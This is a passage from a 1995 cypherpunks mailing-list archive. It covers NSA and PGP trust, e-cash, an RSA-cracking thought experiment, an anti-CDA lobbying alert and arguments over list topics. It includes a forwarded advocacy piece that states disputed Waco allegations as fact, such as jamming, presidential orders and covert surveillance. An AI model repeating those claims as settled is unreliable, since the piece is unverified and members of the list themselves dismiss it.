the public? I don't see the connection between A and B if this is what 
you are claiming.

Unless they're gearing up for a PR campaign... I wonder how the NSA has 
been portrayed in Hollywood in the past. I've just seen them mentioned in 
one movie I can think about ("Crimson Tide"). Anyone else know of references?

"Freedom is meaningless unless  | ic58@jove.acs.unt.edu - James Childers
 you can give to those with whom| No man's freedom is safe
 you disagree." - Jefferson     |    while Congress is in session
        EA 73 53 12 4E 08 27 6C   21 64 28 51 92 0E 7C F7





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: liberty@gate.net (Jim Ray)
Date: Thu, 3 Aug 95 12:21:04 PDT
To: cypherpunks@toad.com
Subject: Re: There's a hole in your crypto...
Message-ID: <199508031918.PAA16067@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

- -----BEGIN PGP SIGNED MESSAGE-----

Andrew Spring wrote:

<snip>

>>How do I know PGP IS secure? I don't. That doesn't mean I don't use it or
>
>Doesn't the NSA certify the security of cryptosystems?
>I wonder what they'd say about PGP?

Their consultant, Prof. Dorothy Demming(sp?), has been asked this very
question about PGP, and she deftly avoided comment on both PGP and IDEA.
[I believe this was on NPR, but I'm not certain.] The emergence of NSA
from absolutely secret agency to semi-public status (writing letters,
P.R. concerns, opening a museum, etc.) at the same time as the general 
availability of what's considered by many [including me] to be strong, 
free, cryptography "for the masses" is interpreted by many [including me]
as an implicit NSA comment on the availability of strong crypto in 
general, and on the availability of PGP in particular.
JMR

<snip sig.>


- -----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Freedom isn't Freeh

iQCVAwUBMCEc4m1lp8bpvW01AQG/xQP/YJDZekZBS2S9behLbFEVKdGcMgxagji7
r54EZa7mzQOObtGbi8ucnKZFm0ut7puxcNfJgaGcMmboEaeyo/vlOYeICDBaouLY
I5/RJQwLjiBPcSWeDTSVDbiH4dvszaKrwYo/xC5WA8pv2kbZFEdou5HpHiiof0dV
cTCvF4j90oo=
=sNKQ
- -----END PGP SIGNATURE-----
Regards, Jim Ray

"The people will again respect the law when the law again respects
the will of the people." Jim Ray, Campaign '92
- ------------------------------------------------------------------------
PGP key Fingerprint  51 5D A2 C3 92 2C 56 BE  53 2D 9C A1 B3 50 C9 C8 
Key id. #  E9BD6D35
- ------------------------------------------------------------------------
Support the Phil Zimmermann (Author of PGP) Legal Defense Fund! 
email:  zldf@clark.net or visit http://www.netresponse.com/zldf
________________________________________________________________________

- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMCEg2CoZzwIn1bdtAQH2IQF/e+BP6NnoaQxHgm8bsZQpOLqW5rb4xcMa
aHrUYlP3bYDwv49HYRlz+GQMDTCm2OII
=QYNV
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Thu, 3 Aug 95 12:21:20 PDT
To: "K. M. Ellis" <cypherpunks@toad.com
Subject: Re: Pat Robertson Fears E-cash?
Message-ID: <v02120d03ac46d144088a@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


>I read in the New York Times that a lot of fundamentalist Christians fear
>the e-cash revolution because they believe that eventually everyone will
>be required to bear a tattooed bar code on their right hand which
>would contain all a person's information:  name, d.o.b., birthplace,
>etc.  Such a tattoo would also be used to deduct e-cash from a person's
>"account" when they made purchases.  It's still a bit of a stretch;
>they're using the book of Revelations to back up this theory.


Ah, the perils of book entry. And they had the inventor of digital bearer
certificates right there to talk to.  Tsk. Tsk.

Cheers,
Bob

-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Gate <gate@id.WING.NET>
Date: Thu, 3 Aug 95 13:04:29 PDT
To: cypherpunks@toad.com
Subject: Did Clinton Authorize Electronic Warfare Against Davidians? (fwd)
Message-ID: <Pine.3.89.9508031601.R19826-0100000@dialin1.wing.net>
MIME-Version: 1.0
Content-Type: text/plain


Does this belong?

____________________________|||||||||||||||||||||______________________________
		 R. Leland Lehrman@The Gate, New Haven, CT.     	    
		    http://id.wing.net/~gate/gate.html
	  God, Art, Technology and Ecology Research and Development
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>Do you love the Mother?>>>>>>>>>>>>>>>>>>>>>>>>


---------- Forwarded message ----------
Date: Thu, 3 Aug 1995 11:41:53 -0700 (PDT)
From: Steve Wingate <steve@linex.com>
To: snet <snet-l@world.std.com>
Subject: Did Clinton Authorize Electronic Warfare Against Davidians? (fwd)



               DID CLINTON AUTHORIZE ELECTRONIC WARFARE
                     AGAINST THE BRANCH DAVIDIANS?

Carol Valentine of Waco Remembrance in a release dated 7/18/95 asserts that
the U. S. government engaged in electronic warfare against the Branch
Davidians during the siege at Waco. Actions included jamming SOS signals
being transmitted by the Davidians, jamming incoming radio and TV signals,
dismantling Mt. Carmel's ham radio tower and using sophisticated British
military hardware (perhaps manned by British military personnel) to monitor
the Branch Davidians' every action and word.

Jamming of Radio and TV Signals

President Clinton may have personally approved the radio and TV jamming
operations during the 51-day siege. Jamming of radio and TV signals is
strictly prohibited by U.S. law and can be carried out only in extreme
situations such as war or national security emergencies. President Clinton
himself would have had to sign the order. George Zimmerlee of Marietta,
Georgia has asked President Clinton for a copy of the order bearing his
signature. The White House has refused to provide it, saying that the White
House is not covered by the Freedom of Information Act.

The FBI jammed TV and radio signals as part of its psychological warfare on
the Davidians. Signals were jammed almost completely during the day and
night to prevent the Davidians from hearing news of support from other
Americans. The only signals permitted into Mt. Carmel's airspace during the
siege were those carrying FBI news conferences in which David Koresh was
held up to scorn and the religious views of the Davidians were ridiculed.
Through listening devices, the FBI then studied the Branch Davidian
responses to the briefings:

"You could hear them yelling and screaming about (FBI agent) Ricks and
(BATF agent) Troy, yelling and screaming about (how) people were lying
about them. That came mostly from Schneider", an FBI official told the
Dallas Morning News.

The jamming equipment was supplied by the Federal Communications
Commission.

Morse Code Signals Jammed

On the night of March 14, 1993 and on the following night, Morse Code
messages were flashed by Branch Davidians switching an overhead light on
and off. The message came from the fourth floor of the Mt. Carmel Center.
The flashing lights were picked up by TV cameras, captured on video tape
and later analyzed. Associated Press issued a report stating that it had
analyzed the transmissions and that the message was this: SOS SOS SOS FBI
BROKE NEGOTIATIONS. WANT NEGOTATIONS FROM THE PRESS.

The Morse Code transmissions were also studied by Zimmerlee, who designs and
builds prototype electronic equipment. He is an amateur radio operator, and
holds an FCC General Radiotelephone (Operator) License. "Much of what the
Branch Davidians transmitted has been lost", says Zimmerlee. Apparently the
government was alerted of the Branch Davidian plans by listening devices
planted inside Mt. Carmel. On the night the signal began, the FBI focused
stadium lights into the room from which the signals were being transmitted.
The Morse Code signals were obscured by the much brighter stadium lights.
In addition, a tank was pulled up directly between the light and the TV
cameras. The cameras also began panning back and forth so that viewing the
signal was interrupted during crucial transmission periods.

Interfering with SOS signals violates several international laws, including
the International Telecommunications Convention of Atlantic City, 1947
(Article 44) and the UN International Covenant on Civil and Political
Rights, Part III, Article 19. The message met the International
Telecommunication Union Rules (Article 37) definition of a distress signal.

Davidians Wayne Martin or Jeff Little, now both dead, probably sent the
code, says Zimmerlee. Both were ham radio operators, knew Morse code and
had a proficiency of 20 words per minute. "They were sending coherent, very
readable code--exquisitely good, it was very readable", says Zimmerlee.

Ham Radio Tower Dismantled

According to Zimmerlee's research, Mt. Carmel was an FCC licensed ham radio
station. QST Magazine says Branch Davidian Wayne Martin had talked about
the existence of a ham radio tower at Mt. Carmel with another amateur
operator at Waco. The tower was an inverted "V" 14 megahertz, wire dipole
antenna with which Martin claimed to have made worldwide contact.

During the siege an FBI agent told Associated Press that the FBI intended
to knock down Mt. Carmel's ham radio station. In a letter to Rep. Newt
Gingrich on April 21, 1994 the FBI admitted that "The Branch Davidians had
the means to send and receive communications, and the FBI took steps to
deny those communications ..." FCC has also told Zimmerlee that it has a
classified document pertaining to the amateur radio station or its
operators.

Yet footage of the Mt. Carmel Center on the day of the original BATF raid
does not show a ham radio tower. "The tower was apparently pulled up even
before helicopter gunships begin firing into Mt. Carmel by a government
operative inside Mt. Carmel. My conclusion is that the raid on Mt. Carmel
was a Military Operation, not a search. Communications in this Military
Operation was a high priority target. The government has lied about the
nature and purpose of the raid. Evidence of jamming shows that there was
something extremely dangerous about permitting the Branch Davidians to
communicate with the outside world," says Zimmerlee.

Use of Foreign Military Equipment

As reported by Linda Thompson in "Waco, the Big Lie", the British
government supplied the FBI with a multi-sensor surveillance aircraft,
equipped with forward looking infra-red radar and a low light television
camera. According to an article in "The London Sunday Times" March 21,
1993, "the siege has become a focal point for the world's Special Forces
eager to see the latest equipment being applied to a real crisis. Observer
teams from the American Delta Force and British Special Air Services have
already visited Waco". The London Times also says fibre-optic cables were
inserted within the building at Mt. Carmel and were used to relay a
full-color picture of a whole room from a lens measuring no more than
one-eighth of an inch. Government agents had infiltrated Mt. Carmel before
the raid and replaced normal telephones with converted sets which double as
microphones to relay all conversation inside a room, said The Times.


* Steve Wingate / CITIZEN'S INTELLIGENCE ACCESS BBS / 415.927.2435 / MindNet






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei>
Date: Thu, 3 Aug 95 13:09:55 PDT
To: cypherpunks@toad.com
Subject: Re: There's a hole in your crypto...
Message-ID: <9508032009.AA15757@toad.com>
MIME-Version: 1.0
Content-Type: text/plain



> Nathan Zook writes:
>  > > And is there any way to build trusted system out of small, verifiable
>  > > pieces?  Since the way they're connected could also be questioned, I
>  > > suspect that when you put enough of them together it's just as bad as
>  > > the case of a single, monolithic program.  But this isn't my area, so
>  > > I don't know.

>  > No.  This was essentially proved during the first third of this century.

> Well, I haven't gotten a reply from Nathan Zook on this assertion, so
> can anyone else back it up with some references? Perhaps we're
> discussing different contexts, but proving correct systems composed of
> correct components is still a subject of active research.

> nathan

I suspect that he's referring to Godel's Theorem, which shows that 
in any complete logic system it's possible to make undecidable 
statements. 

I'm not at all sure if this can be extended to computer programs. 
Even if it can, I suspect it only applies to contrived cases.


Peter Trei
Senior Software Engineer
Purveyor Development Team                                
Process Software Corporation
trei@process.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@panix.com>
Date: Thu, 3 Aug 95 13:14:24 PDT
To: The Gate <gate@id.wing.net>
Subject: Re: Did Clinton Authorize Electronic Warfare Against Davidians? (fwd)
In-Reply-To: <Pine.3.89.9508031601.R19826-0100000@dialin1.wing.net>
Message-ID: <199508032014.QAA13009@panix4.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



The Gate writes:
> Does this belong?
> 
>                DID CLINTON AUTHORIZE ELECTRONIC WARFARE
>                      AGAINST THE BRANCH DAVIDIANS?

No, it doesn't belong, and deliberately being a jerk by posting the
whole thing with a "does this belong" at the beginning isn't a way to
win friends and influence people.

I'm beginning to wonder if the conspiracy idiots on this list are here
from the NSA to keep any real work from getting done. Are there any
cypherpunks left here, or is it all just cryptogroupies?

Some of us want to see cryptography deployed, not conspiracy theories
about Waco, Vincent Foster, or your mother.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei>
Date: Thu, 3 Aug 95 13:26:21 PDT
To: cypherpunks@toad.com
Subject: Re: a hole in PGP
Message-ID: <9508032026.AA16303@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Sunder writes:

> Agreed.  If PGP has a hole in it, it's not in the sources, nor in the 
> executables.  Any hole would be a breaking of the RSA or IDEA cyphers by 
> the TLA's who wouldn't talk about it, or the availability of enough super 
> fast hardware to brute force it.

> It wouldn't be that PGP, its sources, or algorithms have holes.  It 
> would be that there is a way to factor RSA that as of yet we don't know 
> about.  And hell, that's as likely as meeting Elvis at your local 7-11. ;-)

One little mental game I sometimes play (when I'm bored with 
deciding what to do when I win the lottery :-) is:

What would you do if you could crack RSA?

Let's suppose you've stumbled upon a very fast factoring algorithm - you 
can crack all of the RSA challenges on your home PC in minutes. What 
do you do next?

Possibilities:

* Post the algorithm to the net [anonymously?].
* Post the solutions to the challenges [anonymously?].
* Apply for a patent.
* Sit on it.
* Write an article for Cryptologia, get the Draper medal.
* Try to cut a deal with RSA
* Try to cut a deal with NSA
* Try to cut a deal with KGB/Saddam/etc.
* Try to keep it a trade secret, but profit from it.

* Escrow an OTP-encoded description of the algorithm, and the OTP, with 
  different (unknown to each other) lawyers, with orders to 
  post them to sci.crypt if you vanish or die mysteriously.

It's sort of fun to speculate...

Peter

PS:I'm still waiting for the SSL challenge to start.






Peter Trei
Senior Software Engineer
Purveyor Development Team                                
Process Software Corporation
trei@process.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ray Cromwell" <s5cromw@watson.ibm.com>
Date: Thu, 3 Aug 95 13:36:49 PDT
To: danisch@ira.uka.de (Hadmut Danisch)
Subject: Re: Object Oriented Crypto API
In-Reply-To: <9508031542.AA03277@elysion.iaks.ira.uka.de>
Message-ID: <9508032035.AA20799@play.watson.ibm.com>
MIME-Version: 1.0
Content-Type: text/plain


>
>
> Good idea.
>
> I would have some suggestions, but first
> an important question:
>
> Is it to be discussed on the Cypherpunks list?

  I don't see why not. It's related to crypto, and it's related to
writing code. Or has the cypherpunks list degenerated into an arena
where the top subjects are the Waco hearings, paranoid government/NSA
rumors, US vs German censorship, and irrelevant political messages?

-Ray






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dorothy Voss <virgie2@ais.net>
Date: Thu, 3 Aug 95 14:35:14 PDT
To: cypherpunks@toad.com
Subject: ALERT: House to Vote This Week on Net-Censorship Bills (fwd)
Message-ID: <Pine.3.89.9508031605.A16583-0100000@eagle.ais.net>
MIME-Version: 1.0
Content-Type: text/plain




---------- Forwarded message ----------
Date: Tue, 1 Aug 1995 17:43:34 -0400
From: editor@cdt.org
To: policy-posts@cdt.org
Subject: ALERT: House to Vote This Week on Net-Censorship Bills


HOUSE TO VOTE THIS WEEK
-----------------------

The House of Representatives will vote late Thursday or early Friday
(Aug 3 or 4) on whether to add the Cox/Wyden Internet Freedom and Family
Empowerment Act as an amendment to the House Telecommunications Reform 
Bill (HR 1555). 

The Cox/Wyden amendment is a direct attack on the Exon/Coats Communications
Decency Act (CDA). House passage of the Cox/Wyden amendment is the last 
chance we have to defeat the Exon/Coats CDA. If the House fails to pass
Cox/Wyden, the Exon bill will likely become law.

We must act now to head off this possibility. Please take a moment to
contact your member of Congress and urge them to support the Cox/Wyden
legislation (described in the alert below). 

The attached alert is from a coalition organized by the Voters
Telecommunications Watch (VTW) which includes CDT, EFF, EPIC, and other 
online advocacy organizations.

This may be your last chance to make your voice heard on this critical 
issue, so please call before Friday August 4.

========================================================================
       CAMPAIGN TO STOP THE EXON/COATS COMMUNICATIONS DECENCY ACT
        (SEE THE LIST OF CAMPAIGN COALITION MEMBERS AT THE END)

        Update: -Latest News:
                        House vows to vote on Telecomm bill (which
                        includes the CDA) this week before recess!
                -What You Can Do Now

       ***   THIS IS YOUR LAST CHANCE TO MAKE A DIFFERENCE.      ***
       ***   THE HOUSE WILL VOTE ON THE COMMUNICATIONS DECENCY   ***
       ***   ACT THIS WEEK.  IF WE LOSE, IT WILL BECOME LAW.     ***

        CAMPAIGN TO STOP THE UNCONSTITUTIONAL COMMUNICATIONS DECENCY ACT
                             July 30, 1995

      PLEASE WIDELY REDISTRIBUTE THIS DOCUMENT WITH THIS BANNER INTACT
                 REDISTRIBUTE ONLY UNTIL August 14, 1995
             REPRODUCE THIS ALERT ONLY IN RELEVANT FORUMS

      Distributed by the Voters Telecommunications Watch (vtw@vtw.org)
________________________________________________________________________
CONTENTS
        The Latest News
        What You Can Do Now
        What is Cox/Wyden? (HR1978)
        Chronology of the CDA
        For More Information
        List Of Participating Organizations
        List of the House of Representatives

________________________________________________________________________
THE LATEST NEWS

This week the House of Representatives will choose between
ANTI-FREE-MARKET PRO-CENSORSHIP LEGISLATION (the Exon/Coats
Communications Decency Act) and ANTI-CENSORSHIP PRO-PARENTAL-CONTROL
LEGISLATION (the Cox/Wyden Internet Freedom and Family Empowerment Act
- HR1978).

THIS IS YOUR LAST CHANCE AS A CITIZEN TO MAKE A DIFFERENCE.  IF WE LOSE
THIS VOTE, THE COMMUNICATIONS DECENCY ACT, ALREADY PASSED BY THE SENATE,
WILL BECOME US LAW.

The vision of a cyberspace ONLY FIT FOR CHILDREN will become reality.

The Communications Decency Act will be offered by supporters of
conservative pro-censorship groups THIS WEEK.  They will try and amend
HR1555 to include the Communications Decency Act and remove any other
net-friendly language such as the Leahy/Klink study.

________________________________________________________________________
WHAT YOU CAN DO NOW

1. THERE'S NO TIME FOR EMAIL OR SNAIL MAIL.  CALL OR FAX YOUR
   REPRESENTATIVE NOW.

2. Find your rep (instructions below) and urge them to oppose the
   Communications Decency Act and support parental control legislation
   (the Cox/Wyden "Internet Freedom and Family Empowerment Act" HR1978)

   Figure out who your Rep is; feel free to use the following sample.
   
** See Instructions Below On How To Obtain Your Rep's Phone and Fax Number **

   SAMPLE PHONE CALL
    (Y=You, S=Rep's Staffer)    
        <ring ring>
        S:Rep. Snark's office, may I help you?

        Y:Hi, As your constituent I'd like to urge Rep Snark to
          oppose Internet censorship legislation such as the Exon/Coats
          Communications Decency Act and support parental control bills
          such as the Cox/Wyden Internet Freedom and Family Empowerment
          Act - HR1978.

        S:Anything else?
        Y:Yes, where does Rep. Snark stand on this issue?
        S:Rep. Snark supports HR1978.
        Y:Thank you!

   Take the response you get and mail it to vtw@vtw.org.  We'll be
   totalling up the responses and counting votes.  Send it to us
   with the subject line of "house call".

        $ Mail vtw@vtw.org
        Subject: house call
        I live in Ohio and I called Rep Snark.  Snark's staffer
        said he favors HR1978 too!
        .
        Mail sent...
        $

   SAMPLE FAX 
        Dear Representative Snark,

        As your constituent I'd like to urge Rep Snark to oppose
        Internet censorship legislation such as the Exon/Coats
        Communications Decency Act and support parental control bills
        such as the Cox/Wyden Internet Freedom and Family Empowerment
        Act - HR1978.

        Sincerely,
        
        <your address>
        
3. Ask your Internet Service Provider or Sysop to put the following
   message into their "message of the day".  We also encourage you
   to forward the following short announcement to relevant mailing
   lists where a copy of this alert would be too long for the list.

        8/1/95: The Communications Decency Act (CDA) will be voted on
        by the House of Representatives this week.  IT IS CRUCIAL THAT
        YOU CALL YOUR REPRESENTATIVE NOW.  To get a copy of the alert,
        send mail to vtw@vtw.org with "send alert" in the subject line,
        gopher -p 1/vtw/exon/alert gopher.panix.com, or
        URL:gopher://gopher.panix.com:70/00/vtw/exon/alert

4. Forward a copy of this alert to your friends until the "freshness
   date" above.  THIS IS CRUCIAL.  WE NEED TO GENERATE CALLS OF SUPPORT
   OR THE COMMUNICATIONS DECENCY ACT WILL BECOME LAW.

5. Congratulate yourself!  You've done your part to save cyberspace.

________________________________________________________________________
HOW TO FIND YOUR REPRESENTATIVE'S PHONE AND FAX NUMBER:

1. If you don't remember your representative's phone number, send email to
 
     reps@cdt.org

   You will automatically receive a list of all 435 members of the House of
   Representatives with phone and fax numbers.

2. OR, call the Capitol Switchboard (+1.202.225.3121) and ask to be 
   connected to your Rep's office. If you don't remember who
   your Rep. is, the operator can tell you when provided with your zipcode.

________________________________________________________________________
WHAT IS COX/WYDEN?

Cox/Wyden (HR1978) is legislation intended to prevent the Federal
Communications Commission (FCC) from imposing content regulations on
cyberspace and encourage private sector development and deployment of
parental control technologies.

Throughout HR1978's history, civil liberties advocates from ACLU, CDT,
EPIC & PFAW have examined the bill and recommended modifications to
ensure that the bill does not negatively impact your privacy or civil
liberties.  Although several questions still remain, Representatives
Cox and Wyden are committed to addressing these concerns.  As the
legislation moves to the House/Senate conference committee, civil
liberties advocates will continue to submit changes to the
Representatives' staffers throughout the conference process where the
House bill and the Senate-approved Communications Decency Act are
reconciled.

________________________________________________________________________
CHRONOLOGY OF THE COMMUNICATIONS DECENCY ACT

House vote to occur before Friday August 4, 1995.

Jun 30, '95     Cox and Wyden introduce the "Internet Freedom and Family
                Empowerment Act" (HR 1978) as an alternative to the CDA.
Jun 21, '95     Several prominent House members publicly announce their
                opposition to the CDA, including Rep. Newt Gingrich (R-GA),
                Rep. Chris Cox (R-CA), and Rep. Ron Wyden (D-OR).
Jun 14, '95     The Senate passes the CDA as attached to the Telecomm
                reform bill (S 652) by a vote of 84-16.  The Leahy bill
                (S 714) is not passed.
May 24, '95     The House Telecomm Reform bill (HR 1555) leaves committee
                in the House with the Leahy alternative attached to it,
                thanks to Rep. Ron Klink (D-PA).  The Communications
                Decency Act is not attached to it.
Apr  7, '95     Sen. Leahy (D-VT) introduces S.714, an alternative to
                the Exon/Gorton bill, which commissions the Dept. of
                Justice to study the problem to see if additional legislation
                (such as the CDA) is necessary.
Mar 23, '95     S314 amended and attached to the telecommunications reform
                bill by Sen. Gorton (R-WA).  Language provides some provider
                protection, but continues to infringe upon email privacy
                and free speech.
Feb 21, '95     HR1004 referred to the House Commerce and Judiciary committees
Feb 21, '95     HR1004 introduced by Rep. Johnson (D-SD)
Feb  1, '95     S314 referred to the Senate Commerce committee
Feb  1, '95     S314 introduced by Sen. Exon (D-NE) and Gorton (R-WA).

________________________________________________________________________
FOR MORE INFORMATION

Web Sites
        URL:http://www.panix.com/vtw/exon/
        URL:http://epic.org/
        URL:http://www.eff.org/pub/Alerts/
        URL:http://www.cdt.org/cda.html
        URL:http://outpost.callnet.com/outpost.html

FTP Archives 
        URL:ftp://ftp.cdt.org/pub/cdt/policy/freespeech/00-INDEX.FREESPEECH
        URL:ftp://ftp.eff.org/pub/Alerts/

Gopher Archives:
        URL:gopher://gopher.panix.com/11/vtw/exon
        URL:gopher://gopher.eff.org/11/Alerts

Email:
        vtw@vtw.org (put "send alert" in the subject line for the latest
                alert, or "send cdafaq" for the CDA FAQ)
        cda-info@cdt.org (General CDA information)
        cda-stat@cdt.org (Current status of the CDA)

________________________________________________________________________
LIST OF PARTICIPATING ORGANIZATIONS

In order to use the net more effectively, several organizations have
joined forces on a single Congressional net campaign to stop the
Communications Decency Act.


American Communication Association * American Council for the Arts *
Arts & Technology Society * Association of Alternative Newsweeklies *
biancaTroll productions * Californians Against Censorship Together *
Center For Democracy And Technology * Centre for Democratic
Communications * Center for Public Representation * Citizen's Voice -
New Zealand * Cloud 9 Internet * Computer Communicators Association *
Computel Network Services * Computer Professionals for Social
Responsibility * Cross Connection * Cyber-Rights Campaign * CyberQueer
Lounge * Dutch Digital Citizens' Movement * ECHO Communications Group,
Inc. * Electronic Frontier Canada * Electronic Frontier Foundation *
Electronic Frontier Foundation - Austin * Electronic Frontiers
Australia * Electronic Frontiers Houston * Electronic Frontiers New
Hampshire * Electronic Privacy Information Center * Feminists For Free
Expression * First Amendment Teach-In * Florida Coalition Against
Censorship * FranceCom, Inc. Web Advertising Services * Friendly
Anti-Censorship Taskforce for Students * Hands Off!  The Net * Human
Rights Watch * Inland Book Company * Inner Circle Technologies, Inc. *
Inst. for Global Communications * Internet On-Ramp, Inc. * Internet
Users Consortium * Joint Artists' and Music Promotions Political Action
Committee * The Libertarian Party * Marijuana Policy Project *
Metropolitan Data Networks Ltd. * MindVox * MN Grassroots Party *
National Bicycle Greenway * National Campaign for Freedom of Expression
* National Coalition Against Censorship * National Gay and Lesbian Task
Force * National Public Telecomputing Network * National Writers Union
* Oregon Coast RISC * Panix Public Access Internet * People for the
American Way * Republican Liberty Caucus * Rock Out Censorship *
Society for Electronic Access * The Thing International BBS Network *
The WELL * Voters Telecommunications Watch

(Note: All 'Electronic Frontier' organizations are independent entities,
 not EFF chapters or divisions.)
________________________________________________________________________
        End Alert
=======================================================================







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@sensemedia.net (Timothy C. May)
Date: Thu, 3 Aug 95 16:36:05 PDT
To: cypherpunks@toad.com
Subject: Appropriate Topics?
Message-ID: <ac46a6d9010210043f4a@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:35 PM 8/3/95, Ray Cromwell wrote:

>> Good idea.
>>
>> I would have some suggestions, but first
>> an important question:
>>
>> Is it to be discussed on the Cypherpunks list?
>
>  I don't see why not. It's related to crypto, and it's related to
>writing code. Or has the cypherpunks list degenerated into an arena
>where the top subjects are the Waco hearings, paranoid government/NSA
>rumors, US vs German censorship, and irrelevant political messages?

As I see things, talking about Ray's ideas for an object-oriented crypto
library is a big part of what this list is for. (Ditto for Wei Dai's code,
for Hal's code, and so on.)

However, it's a mistake to think that the _only_ thing appropriate for the
list is talking about code (of either kind). Not that Ray said this.

It seems to me the list is pretty well-balanced between several different
kinds of topics:

* crypto -- RSA, Diffie-Hellman, entropy, randomness, denial of service
attacks, and so on.

* software -- PGP implementations, hooks to other programs, MIME, Unix,
C++, Java, TCL, etc.

* policy -- Exon, EFF, Perl t-shirts, law, export, etc. (The worst of these
are the long policy analyses forwarded to this list from other places.)

* cultural -- movies with crypto or security themes, books, comments,
humor, etc.

* speculation -- tax effects, money laundering, crypto anarchy, etc.

* rants and conspiracies -- coverups, NSA, Waco, black helicopters, Masons,
etc. (the worst of these rants are long, rambling conspiracy theories
forwarded to this list from other places...these are probably the items
that least belong here).

(Note that the two serious problems--policy statements and conspiracy rants
forwarded from other places--share a common point: they are not written for
the Cypherpunks list by Cypherpunks...they are just stuff forwarded, with
only tangential interest to the list. And they tend to be long.)

Are these themes appropriate? Some folks want to read posts on one topic,
some on others, etc.

It's a fact that highly-specialized or detailed posts about, say, crypto
libraries, will not get as many general comments--in real life or on this
list--as a reference to a current movie will get. That's the nature of
things. I could go on about why this is so, but I think you all know why.

The "Cypherpunks write code" mantra, sometimes cited by those who dislike
the discussions they see, has a broader interpretation. To wit, instead of
asking others to write the code you want to see, try writing it yourself.
And this directly relates to postings: instead of asking for a different
kind of post, one should just _write_ that kind of post!

People will talk about what they want to talk about. If they get _too_ far
off into themes only distantly related to the ostensible themes of this
list, then usually some slight peer pressure will work. Plus, if people
don't respond, the threads die.

The noise messages of the form "This is not about writing code; this does
not belong on Cypherpunks" are misguided. The list is made up of people who
have crypto and privacy concerns broader than just writing C++ code for
Sparcstations.

--Tim May





..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,
tcmay@sensemedia.net   | anonymous networks, digital pseudonyms, zero
408-728-0152           | knowledge, reputations, information markets,
Corralitos, CA         | black markets, collapse of governments.
Higher Power: 2^756839 | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike Bailey <bailey@computek.net>
Date: Thu, 3 Aug 95 15:22:47 PDT
To: perry@piermont.com
Subject: Re: Did Clinton Authorize Electronic Warfare Against Davidians? (fwd)
In-Reply-To: <199508032014.QAA13009@panix4.panix.com>
Message-ID: <Pine.SUN.3.91.950803172414.6476G-100000@bambam.computek.net>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 3 Aug 1995, Perry E. Metzger wrote:

> 
> The Gate writes:
> > Does this belong?
> > 
> >                DID CLINTON AUTHORIZE ELECTRONIC WARFARE
> >                      AGAINST THE BRANCH DAVIDIANS?
> 
> No, it doesn't belong, and deliberately being a jerk by posting the
> whole thing with a "does this belong at the beginning" isn't a way to
> win friends and influence people.
> 
> I'm beginning to wonder if the conspiracy idiots on this list are here
> from the NSA to keep any real work getting done. Are there any
> cypherpunks left here, or is it all just cryptogroupies?
> 
> Some of us want to see cryptography deployed, not conspiracy theories
> about Waco, Vincent Foster, or your mother.
> 

Who told you about my mother ??

It is all lies ... my mother has never been to Waco
and I'm sure the NSA is involved in a misinformation campaign
and cover-up 8-)


.sig withheld to stump the aoler's.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Rosenberg" <hal9001@panix.com>
Date: Thu, 3 Aug 95 14:42:41 PDT
To: cypherpunks@toad.com
Subject: Re: "The Net"
Message-ID: <v02130504ac46ebb00ec5@[166.84.254.3]>
MIME-Version: 1.0
Content-Type: text/plain


At 21:30 8/2/95, Dr. Dimitri Vulis wrote:
>Not as good as Sneakers...

Which has the classic in-gag of the Hero and Villain sitting down on the
Villain's Cray (used to do code cracking presumably) with no indication
(except to those who recognize it as a Cray and get the gag) of its
significance or use.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mac Norton <mnorton@cavern.uark.edu>
Date: Fri, 4 Aug 95 02:35:49 PDT
To: perry@piermont.com
Subject: Re: Noise: PBS under the Republicans (fwd)
In-Reply-To: <199508031636.MAA00571@panix4.panix.com>
Message-ID: <Pine.SOL.3.91.950803180422.29640D-100000@cavern>
MIME-Version: 1.0
Content-Type: text/plain




On Thu, 3 Aug 1995, Perry E. Metzger wrote:

> 
> What, exactly, does this have to do with cryptography?
> 
> .pm

If you have to ask, you can't afford it.

MacN




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: danisch@ira.uka.de (Hadmut Danisch)
Date: Thu, 3 Aug 95 13:26:35 PDT
To: s5cromw@watson.ibm.com
Subject: Re: Object Oriented Crypto API
Message-ID: <9508031542.AA03277@elysion.iaks.ira.uka.de>
MIME-Version: 1.0
Content-Type: text/plain



Good idea.

I would have some suggestions, but first
an important question:

Is it to be discussed on the Cypherpunks list?

Hadmut




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
